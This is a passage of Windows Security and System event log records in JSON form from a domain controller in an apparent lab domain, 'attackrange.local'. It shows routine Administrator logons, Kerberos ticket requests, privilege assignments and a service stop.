{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220492,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D893\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6d893","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76863,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The Windows Insider Service service entered the stopped state.","param1":"Windows Insider Service","param2":"stopped","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220493,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220494,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220495,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220496,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DB65\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6db65","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220497,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DB65\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6db65","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220498,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220499,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220500,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220501,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DDA3\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6dda3","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220502,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DDA3\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6dda3","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220503,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220504,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested 